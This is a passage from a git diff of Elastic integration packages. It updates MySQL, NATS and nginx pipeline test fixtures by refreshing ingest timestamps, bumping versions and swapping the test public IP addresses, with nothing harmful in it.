"ingested": "2021-12-09T13:41:36.098145500Z", "category": [ "database" ], @@ -277,7 +277,7 @@ }, "event": { "duration": 297000, - "ingested": "2021-06-21T12:35:20.504202053Z", + "ingested": "2021-12-09T13:41:36.098151Z", "category": [ "database" ], @@ -309,7 +309,7 @@ }, "event": { "duration": 1676000, - "ingested": "2021-06-21T12:35:20.504202828Z", + "ingested": "2021-12-09T13:41:36.098157Z", "category": [ "database" ], @@ -341,7 +341,7 @@ }, "event": { "duration": 8782000, - "ingested": "2021-06-21T12:35:20.504203367Z", + "ingested": "2021-12-09T13:41:36.098162500Z", "category": [ "database" ], @@ -374,7 +374,7 @@ }, "event": { "duration": 2000268000, - "ingested": "2021-06-21T12:35:20.504204455Z", + "ingested": "2021-12-09T13:41:36.098173500Z", "category": [ "database" ], @@ -408,7 +408,7 @@ }, "event": { "duration": 138000, - "ingested": "2021-06-21T12:35:20.504205659Z", + "ingested": "2021-12-09T13:41:36.098184700Z", "category": [ "database" ], @@ -441,7 +441,7 @@ }, "event": { "duration": 159000, - "ingested": "2021-06-21T12:35:20.504206736Z", + "ingested": "2021-12-09T13:41:36.098195700Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-ubuntu-8-0-15.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-ubuntu-8-0-15.log-expected.json index fc80b5766e9..f70f0393c98 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-ubuntu-8-0-15.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-ubuntu-8-0-15.log-expected.json @@ -23,7 +23,7 @@ }, "event": { "duration": 2475469000, - "ingested": "2021-06-21T12:35:20.693828588Z", + "ingested": "2021-12-09T13:41:36.500388500Z", "category": [ "database" ], @@ -75,7 +75,7 @@ }, "event": { "duration": 2631844000, - "ingested": "2021-06-21T12:35:20.693829569Z", + "ingested": "2021-12-09T13:41:36.500399300Z", "kind": "event", "start": "2019-03-24T14:04:51.082107Z", "end": "2019-03-24T14:04:53.713951Z", diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-5-7-19-innodb.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-5-7-19-innodb.log-expected.json index 9a70b6b042f..07ab6881b9c 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-5-7-19-innodb.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-5-7-19-innodb.log-expected.json @@ -38,7 +38,7 @@ }, "event": { "duration": 50365000, - "ingested": "2021-06-21T12:35:20.744185651Z", + "ingested": "2021-12-09T13:41:36.598402400Z", "category": [ "database" ], @@ -105,7 +105,7 @@ }, "event": { "duration": 153883488000, - "ingested": "2021-06-21T12:35:20.744187718Z", + "ingested": "2021-12-09T13:41:36.598410100Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-5-7-19.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-5-7-19.log-expected.json index 8a1afd3a0d4..55353133f99 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-5-7-19.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-5-7-19.log-expected.json @@ -38,7 +38,7 @@ }, "event": { "duration": 10569000, - "ingested": "2021-06-21T12:35:20.946948681Z", + "ingested": "2021-12-09T13:41:36.702401Z", "category": [ "database" ], @@ -104,7 +104,7 @@ }, "event": { "duration": 36112000, - "ingested": "2021-06-21T12:35:20.946949854Z", + "ingested": "2021-12-09T13:41:36.702413600Z", "category": [ "database" ], @@ -155,7 +155,7 @@ }, "event": { "duration": 23385000, - "ingested": "2021-06-21T12:35:20.946950886Z", + "ingested": "2021-12-09T13:41:36.702443800Z", "category": [ "database" ], @@ -210,7 +210,7 @@ }, "event": { "duration": 10278000, - "ingested": "2021-06-21T12:35:20.946951930Z", + "ingested": "2021-12-09T13:41:36.702451500Z", "category": [ "database" ], @@ -261,7 +261,7 @@ }, "event": { "duration": 14315000, - "ingested": "2021-06-21T12:35:20.946952975Z", + "ingested": "2021-12-09T13:41:36.702462700Z", "category": [ "database" ], @@ -312,7 +312,7 @@ }, "event": { "duration": 50365000, - "ingested": "2021-06-21T12:35:20.946954191Z", + "ingested": "2021-12-09T13:41:36.702472500Z", "category": [ "database" ], @@ -378,7 +378,7 @@ }, "event": { "duration": 32463768000, - "ingested": "2021-06-21T12:35:20.946955255Z", + "ingested": "2021-12-09T13:41:36.702507500Z", "category": [ "database" ], @@ -445,7 +445,7 @@ }, "event": { "duration": 153883488000, - "ingested": "2021-06-21T12:35:20.946956305Z", + "ingested": "2021-12-09T13:41:36.702586Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-8-0-15.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-8-0-15.log-expected.json index 71399ca1be2..182ac790fc8 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-8-0-15.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-percona-ubuntu-8-0-15.log-expected.json @@ -27,7 +27,7 @@ }, "event": { "duration": 2746607000, - "ingested": "2021-06-21T12:35:21.423165153Z", + "ingested": "2021-12-09T13:41:37.032283100Z", "category": [ "database" ], @@ -91,7 +91,7 @@ }, "event": { "duration": 3133066000, - "ingested": "2021-06-21T12:35:21.423166150Z", + "ingested": "2021-12-09T13:41:37.032302500Z", "category": [ "database" ], diff --git a/packages/mysql/manifest.yml b/packages/mysql/manifest.yml index 7a33d67379b..7420c525fcd 100644 --- a/packages/mysql/manifest.yml +++ b/packages/mysql/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: mysql title: MySQL -version: 1.2.0 +version: 1.2.1 license: basic description: Collect logs and metrics from MySQL servers with Elastic Agent. type: integration diff --git a/packages/nats/changelog.yml b/packages/nats/changelog.yml index f0c1dce429f..f8981e17f21 100644 --- a/packages/nats/changelog.yml +++ b/packages/nats/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.2.0" changes: - description: Release nats package for v8.0.0 diff --git a/packages/nats/data_stream/log/_dev/test/pipeline/test-log-sample.log b/packages/nats/data_stream/log/_dev/test/pipeline/test-log-sample.log index 1633bf0d183..59308611cf0 100644 --- a/packages/nats/data_stream/log/_dev/test/pipeline/test-log-sample.log +++ b/packages/nats/data_stream/log/_dev/test/pipeline/test-log-sample.log @@ -7,13 +7,13 @@ [1] 2019/02/06 07:20:08.512052 [TRC] 172.18.0.1:38630 - cid:1 - ->> [SUB foo 1] [1] 2019/02/06 07:20:08.512128 [TRC] 172.18.0.1:38630 - cid:1 - ->> [PING] [1] 2019/02/06 07:20:08.512153 [TRC] 172.18.0.1:38630 - cid:1 - <<- [PONG] -[1] 2019/02/04 15:40:02.717819 [TRC] 50.39.246.116:62388 - cid:3 - ->> [PUB aiuser.platinum1.pingpeer _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 20] -[1] 2019/02/04 15:40:02.717825 [TRC] 50.39.246.116:62388 - cid:3 - ->> MSG_PAYLOAD: [peer, are you alive?] -[1] 2019/02/04 15:40:02.717825 [TRC] 50.39.246.116:62388 - cid:3 - <<- MSG_PAYLOAD: [\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"] +[1] 2019/02/04 15:40:02.717819 [TRC] 67.43.156.14:62388 - cid:3 - ->> [PUB aiuser.platinum1.pingpeer _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 20] +[1] 2019/02/04 15:40:02.717825 [TRC] 67.43.156.14:62388 - cid:3 - ->> MSG_PAYLOAD: [peer, are you alive?] +[1] 2019/02/04 15:40:02.717825 [TRC] 67.43.156.14:62388 - cid:3 - <<- MSG_PAYLOAD: [\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"] [1] 2019/02/04 15:40:02.717832 [TRC] 192.168.176.11:36262 - cid:4 - <<- [MSG aiuser.platinum1.pingpeer 1 _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 20] [1] 2019/02/04 15:40:02.718007 [TRC] 192.168.176.11:36262 - cid:4 - ->> [PUB _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 17] [1] 2019/02/04 15:40:02.718023 [TRC] 192.168.176.11:36262 - cid:4 - ->> MSG_PAYLOAD: [I am fine, agent!] -[1] 2019/02/04 15:40:02.718044 [TRC] 50.39.246.116:62388 - cid:3 - <<- [MSG _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 11 17] -[1] 2019/02/04 15:40:02.717600 [TRC] 50.39.246.116:62388 - cid:3 - ->> [PUB aiuser.platinum1.appstats 1583] +[1] 2019/02/04 15:40:02.718044 [TRC] 67.43.156.14:62388 - cid:3 - <<- [MSG _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 11 17] +[1] 2019/02/04 15:40:02.717600 [TRC] 67.43.156.14:62388 - cid:3 - ->> [PUB aiuser.platinum1.appstats 1583] [1] 2019/02/04 15:40:02.717811 [TRC] 192.168.176.11:36262 - cid:4 - <<- [MSG aiuser.platinum1.appstats 6 1583] [1] 2019/02/16 07:20:08.512153 [TRC] 172.18.0.1:38630 - cid:1 - <<- [OK] \ No newline at end of file diff --git a/packages/nats/data_stream/log/_dev/test/pipeline/test-log-sample.log-expected.json b/packages/nats/data_stream/log/_dev/test/pipeline/test-log-sample.log-expected.json index 1acf51e309c..29a7ea6897b 100644 --- a/packages/nats/data_stream/log/_dev/test/pipeline/test-log-sample.log-expected.json +++ b/packages/nats/data_stream/log/_dev/test/pipeline/test-log-sample.log-expected.json @@ -17,7 +17,7 @@ "level": "info" }, "event": { - "ingested": "2021-10-27T10:26:49.197765249Z", + "ingested": "2021-12-09T13:41:38.300043500Z", "original": "[1] 2019/02/06 07:19:40.624334 [INF] Starting nats-server version 1.3.0", "type": [ "info" @@ -47,7 +47,7 @@ "level": "info" }, "event": { - "ingested": "2021-10-27T10:26:49.197769348Z", + "ingested": "2021-12-09T13:41:38.300056800Z", "original": "[1] 2019/02/06 07:19:40.624547 [INF] Git commit [eed4fbc]", "type": [ "info" @@ -77,7 +77,7 @@ "level": "info" }, "event": { - "ingested": "2021-10-27T10:26:49.197771417Z", + "ingested": "2021-12-09T13:41:38.300065700Z", "original": "[1] 2019/02/06 07:19:40.624674 [INF] Listening for client connections on 0.0.0.0:4222", "type": [ "info" @@ -107,7 +107,7 @@ "level": "info" }, "event": { - "ingested": "2021-10-27T10:26:49.197773209Z", + "ingested": "2021-12-09T13:41:38.300073600Z", "original": "[1] 2019/02/06 07:19:40.624690 [INF] Server is ready", "type": [ "info" @@ -153,7 +153,7 @@ "ip": "172.18.0.1" }, "event": { - "ingested": "2021-10-27T10:26:49.197775006Z", + "ingested": "2021-12-09T13:41:38.300081500Z", "original": "[1] 2019/02/06 07:20:08.508891 [DBG] 172.18.0.1:38630 - cid:1 - Client connection created", "type": [ "info" @@ -200,7 +200,7 @@ "ip": "172.18.0.1" }, "event": { - "ingested": "2021-10-27T10:26:49.197776708Z", + "ingested": "2021-12-09T13:41:38.300092400Z", "original": "[1] 2019/02/06 07:20:08.510296 [TRC] 172.18.0.1:38630 - cid:1 - -\u003e\u003e [CONNECT {\"verbose\":false,\"pedantic\":false,\"tls_required\":false,\"name\":\"NATS Benchmark\",\"lang\":\"go\",\"version\":\"1.7.0\",\"protocol\":1,\"echo\":true}]", "type": [ "info" @@ -248,7 +248,7 @@ "ip": "172.18.0.1" }, "event": { - "ingested": "2021-10-27T10:26:49.197778387Z", + "ingested": "2021-12-09T13:41:38.300100900Z", "original": "[1] 2019/02/06 07:20:08.512052 [TRC] 172.18.0.1:38630 - cid:1 - -\u003e\u003e [SUB foo 1]", "type": [ "info" @@ -294,7 +294,7 @@ "ip": "172.18.0.1" }, "event": { - "ingested": "2021-10-27T10:26:49.197780020Z", + "ingested": "2021-12-09T13:41:38.300108600Z", "original": "[1] 2019/02/06 07:20:08.512128 [TRC] 172.18.0.1:38630 - cid:1 - -\u003e\u003e [PING]", "type": [ "info" @@ -340,7 +340,7 @@ "ip": "172.18.0.1" }, "event": { - "ingested": "2021-10-27T10:26:49.197781703Z", + "ingested": "2021-12-09T13:41:38.300116600Z", "original": "[1] 2019/02/06 07:20:08.512153 [TRC] 172.18.0.1:38630 - cid:1 - \u003c\u003c- [PONG]", "type": [ "info" @@ -381,16 +381,16 @@ }, "related": { "ip": [ - "50.39.246.116" + "67.43.156.14" ] }, "client": { "port": 62388, - "ip": "50.39.246.116" + "ip": "67.43.156.14" }, "event": { - "ingested": "2021-10-27T10:26:49.197783401Z", - "original": "[1] 2019/02/04 15:40:02.717819 [TRC] 50.39.246.116:62388 - cid:3 - -\u003e\u003e [PUB aiuser.platinum1.pingpeer _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 20]", + "ingested": "2021-12-09T13:41:38.300124900Z", + "original": "[1] 2019/02/04 15:40:02.717819 [TRC] 67.43.156.14:62388 - cid:3 - -\u003e\u003e [PUB aiuser.platinum1.pingpeer _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 20]", "type": [ "info" ], @@ -427,16 +427,16 @@ }, "related": { "ip": [ - "50.39.246.116" + "67.43.156.14" ] }, "client": { "port": 62388, - "ip": "50.39.246.116" + "ip": "67.43.156.14" }, "event": { - "ingested": "2021-10-27T10:26:49.197785054Z", - "original": "[1] 2019/02/04 15:40:02.717825 [TRC] 50.39.246.116:62388 - cid:3 - -\u003e\u003e MSG_PAYLOAD: [peer, are you alive?]", + "ingested": "2021-12-09T13:41:38.300133Z", + "original": "[1] 2019/02/04 15:40:02.717825 [TRC] 67.43.156.14:62388 - cid:3 - -\u003e\u003e MSG_PAYLOAD: [peer, are you alive?]", "type": [ "info" ], @@ -473,16 +473,16 @@ }, "related": { "ip": [ - "50.39.246.116" + "67.43.156.14" ] }, "client": { "port": 62388, - "ip": "50.39.246.116" + "ip": "67.43.156.14" }, "event": { - "ingested": "2021-10-27T10:26:49.197786896Z", - "original": "[1] 2019/02/04 15:40:02.717825 [TRC] 50.39.246.116:62388 - cid:3 - \u003c\u003c- MSG_PAYLOAD: [\\\"\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\"]", + "ingested": "2021-12-09T13:41:38.300141700Z", + "original": "[1] 2019/02/04 15:40:02.717825 [TRC] 67.43.156.14:62388 - cid:3 - \u003c\u003c- MSG_PAYLOAD: [\\\"\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\"]", "type": [ "info" ], @@ -531,7 +531,7 @@ "ip": "192.168.176.11" }, "event": { - "ingested": "2021-10-27T10:26:49.197788580Z", + "ingested": "2021-12-09T13:41:38.300148600Z", "original": "[1] 2019/02/04 15:40:02.717832 [TRC] 192.168.176.11:36262 - cid:4 - \u003c\u003c- [MSG aiuser.platinum1.pingpeer 1 _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 20]", "type": [ "info" @@ -579,7 +579,7 @@ "ip": "192.168.176.11" }, "event": { - "ingested": "2021-10-27T10:26:49.197790211Z", + "ingested": "2021-12-09T13:41:38.300153800Z", "original": "[1] 2019/02/04 15:40:02.718007 [TRC] 192.168.176.11:36262 - cid:4 - -\u003e\u003e [PUB _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 17]", "type": [ "info" @@ -625,7 +625,7 @@ "ip": "192.168.176.11" }, "event": { - "ingested": "2021-10-27T10:26:49.197791877Z", + "ingested": "2021-12-09T13:41:38.300160800Z", "original": "[1] 2019/02/04 15:40:02.718023 [TRC] 192.168.176.11:36262 - cid:4 - -\u003e\u003e MSG_PAYLOAD: [I am fine, agent!]", "type": [ "info" @@ -666,16 +666,16 @@ }, "related": { "ip": [ - "50.39.246.116" + "67.43.156.14" ] }, "client": { "port": 62388, - "ip": "50.39.246.116" + "ip": "67.43.156.14" }, "event": { - "ingested": "2021-10-27T10:26:49.197793541Z", - "original": "[1] 2019/02/04 15:40:02.718044 [TRC] 50.39.246.116:62388 - cid:3 - \u003c\u003c- [MSG _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 11 17]", + "ingested": "2021-12-09T13:41:38.300169300Z", + "original": "[1] 2019/02/04 15:40:02.718044 [TRC] 67.43.156.14:62388 - cid:3 - \u003c\u003c- [MSG _INBOX.e3hAUbP4r5wbjw3Hudw42r.udigGiHn 11 17]", "type": [ "info" ], @@ -714,16 +714,16 @@ }, "related": { "ip": [ - "50.39.246.116" + "67.43.156.14" ] }, "client": { "port": 62388, - "ip": "50.39.246.116" + "ip": "67.43.156.14" }, "event": { - "ingested": "2021-10-27T10:26:49.197795278Z", - "original": "[1] 2019/02/04 15:40:02.717600 [TRC] 50.39.246.116:62388 - cid:3 - -\u003e\u003e [PUB aiuser.platinum1.appstats 1583]", + "ingested": "2021-12-09T13:41:38.300177100Z", + "original": "[1] 2019/02/04 15:40:02.717600 [TRC] 67.43.156.14:62388 - cid:3 - -\u003e\u003e [PUB aiuser.platinum1.appstats 1583]", "type": [ "info" ], @@ -771,7 +771,7 @@ "ip": "192.168.176.11" }, "event": { - "ingested": "2021-10-27T10:26:49.197796956Z", + "ingested": "2021-12-09T13:41:38.300183300Z", "original": "[1] 2019/02/04 15:40:02.717811 [TRC] 192.168.176.11:36262 - cid:4 - \u003c\u003c- [MSG aiuser.platinum1.appstats 6 1583]", "type": [ "info" @@ -817,7 +817,7 @@ "ip": "172.18.0.1" }, "event": { - "ingested": "2021-10-27T10:26:49.197798598Z", + "ingested": "2021-12-09T13:41:38.300190700Z", "original": "[1] 2019/02/16 07:20:08.512153 [TRC] 172.18.0.1:38630 - cid:1 - \u003c\u003c- [OK]", "type": [ "info" diff --git a/packages/nats/manifest.yml b/packages/nats/manifest.yml index 22e84a7e150..b5b42028ea3 100644 --- a/packages/nats/manifest.yml +++ b/packages/nats/manifest.yml @@ -1,6 +1,6 @@ name: nats title: NATS -version: 1.2.0 +version: 1.2.1 release: ga description: Collect logs and metrics from NATS servers with Elastic Agent. type: integration diff --git a/packages/nginx/changelog.yml b/packages/nginx/changelog.yml index ce8f9586beb..05b88bf7e0c 100644 --- a/packages/nginx/changelog.yml +++ b/packages/nginx/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.2" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.2.1" changes: - description: Fix ML module manifest query to ignore frozen and cold tiers diff --git a/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log b/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log index 7acb1428af8..10715a8ff94 100644 --- a/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log +++ b/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log @@ -1,11 +1,11 @@ -77.179.66.156 - - [25/Oct/2016:14:49:33 +0200] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36" -77.179.66.156 - - [25/Oct/2016:14:49:34 +0200] "GET /favicon.ico HTTP/1.1" 404 571 "http://localhost:8080/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36" -77.179.66.156 - - [25/Oct/2016:14:50:44 +0200] "GET /adsasd HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36" -77.179.66.156 - - [07/Dec/2016:10:34:43 +0100] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" -77.179.66.156 - - [07/Dec/2016:10:34:43 +0100] "GET /favicon.ico HTTP/1.1" 404 571 "http://localhost:8080/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" -77.179.66.156 - - [07/Dec/2016:10:43:18 +0100] "GET /test HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" -77.179.66.156 - - [07/Dec/2016:10:43:21 +0100] "GET /test HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" -77.179.66.156 - - [07/Dec/2016:10:43:23 +0100] "GET /test1 HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" +67.43.156.13 - - [25/Oct/2016:14:49:33 +0200] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36" +67.43.156.13 - - [25/Oct/2016:14:49:34 +0200] "GET /favicon.ico HTTP/1.1" 404 571 "http://localhost:8080/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36" +67.43.156.13 - - [25/Oct/2016:14:50:44 +0200] "GET /adsasd HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36" +67.43.156.13 - - [07/Dec/2016:10:34:43 +0100] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" +67.43.156.13 - - [07/Dec/2016:10:34:43 +0100] "GET /favicon.ico HTTP/1.1" 404 571 "http://localhost:8080/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" +67.43.156.13 - - [07/Dec/2016:10:43:18 +0100] "GET /test HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" +67.43.156.13 - - [07/Dec/2016:10:43:21 +0100] "GET /test HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" +67.43.156.13 - - [07/Dec/2016:10:43:23 +0100] "GET /test1 HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" 127.0.0.1 - - [07/Dec/2016:11:04:37 +0100] "GET /test1 HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" 127.0.0.1 - - [07/Dec/2016:11:04:58 +0100] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0" 127.0.0.1 - - [07/Dec/2016:11:04:59 +0100] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0" diff --git a/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log-expected.json b/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log-expected.json index bd1119951d8..778ef7889f7 100644 --- a/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log-expected.json +++ b/packages/nginx/data_stream/access/_dev/test/pipeline/test-access.log-expected.json @@ -4,31 +4,13 @@ "nginx": { "access": { "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/", @@ -44,7 +26,7 @@ "_tmp": {}, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -60,8 +42,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246637400Z", - "original": "77.179.66.156 - - [25/Oct/2016:14:49:33 +0200] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", + "ingested": "2021-12-09T13:41:40.653051900Z", + "original": "67.43.156.13 - - [25/Oct/2016:14:49:33 +0200] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -90,31 +72,13 @@ "nginx": { "access": { "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/favicon.ico", @@ -131,7 +95,7 @@ "_tmp": {}, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -148,8 +112,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246664400Z", - "original": "77.179.66.156 - - [25/Oct/2016:14:49:34 +0200] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", + "ingested": "2021-12-09T13:41:40.653067Z", + "original": "67.43.156.13 - - [25/Oct/2016:14:49:34 +0200] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -178,31 +142,13 @@ "nginx": { "access": { "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/adsasd", @@ -218,7 +164,7 @@ "_tmp": {}, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -234,8 +180,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246673500Z", - "original": "77.179.66.156 - - [25/Oct/2016:14:50:44 +0200] \"GET /adsasd HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", + "ingested": "2021-12-09T13:41:40.653072600Z", + "original": "67.43.156.13 - - [25/Oct/2016:14:50:44 +0200] \"GET /adsasd HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -264,31 +210,13 @@ "nginx": { "access": { "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ] } }, 